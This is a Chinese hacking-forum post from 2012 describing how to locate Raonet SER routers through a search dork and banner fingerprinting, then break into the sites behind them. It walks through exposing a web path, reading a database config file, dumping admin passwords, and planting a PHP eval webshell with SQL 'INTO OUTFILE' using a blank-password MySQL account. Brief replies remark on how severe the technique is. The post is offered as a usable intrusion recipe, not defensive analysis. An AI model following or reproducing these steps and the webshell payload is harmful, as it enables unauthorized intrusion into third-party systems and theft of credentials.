中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
% n/ h$ ?0 P2 ?+ Y6 A# x
! m1 @& D' I m% N
1:google搜索'Raonet Subscriber Ethernet Router'
" u% G& w: h' f9 ^! I' Z" |- V, p8 P( Z
4 f) ~4 B& {2 o8 D
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# v5 F* s" ^/ i9 J
: b; Y' c/ R* a
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
5 T' i6 R0 a4 P- _( k
) V& u0 G) Z( O) n' {
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 H/ u- {( F+ ^3 W
8 P% T* r% q# R2 v. k/ Y
0 g! s$ {8 Z% S$ R( Q* C9 S# p! p
9 {# h- l. U: R0 S+ ^. q- A) v
入侵步骤:
% ?. ^. E7 W, F' g# }
" R2 _% f" H' V3 e
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
. h+ [, N' f9 r0 E
: n! E% H7 k* {* P3 ^3 T1 n; P
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
% G, E$ ~7 o4 n1 |' C# ^$ F
3:得到密码后连接,查看GUI管理密码:
) }: j8 n$ d/ `7 S* C
use ser_500
8 a: h& Q4 ?, b& d- x0 T) B
select id,passwd from user;
l: h( L& F: A' ^
4:通过数据库写入webshell,执行命令:
" B* G. F. ~" [
use mysql;
5 H- Q3 }& ?3 n& h' w3 \2 q" l) f% q7 z
create table ok(cmd TEXT);
. _3 p6 j! S2 Z! f
insert into ok values("<?php @eval($_POST[cmd])?>");
4 w4 z& n+ ?- ~$ _! v/ e
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
+ Z: @! b* }8 {$ N0 B9 y2 O
drop table ok;
y: i0 E7 {* P4 p: k
8 X. V H- |$ v1 H
5:连接后门shell.php
( E# [3 h" r7 P" T! M
/ n3 _4 S" G/ q" R
6. 搞定!
! y$ Z9 {7 F) V+ k" g7 E7 v4 v
( y! v, Y+ z! ^4 V% w- g9 D
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2